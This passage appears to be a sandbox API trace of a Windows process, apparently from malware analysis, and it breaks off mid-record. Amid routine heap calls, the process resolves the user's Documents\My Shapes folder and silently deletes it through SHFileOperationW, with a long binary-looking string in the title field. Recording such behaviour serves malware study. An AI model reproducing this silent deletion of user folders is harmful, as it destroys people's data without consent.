| out: hHeap=0x25c0000) returned 1 [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.837] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0264.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0264.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Shapes", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x8bf658*="My Shapes") returned 0x31 [0264.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0264.839] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 0x14 [0264.839] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\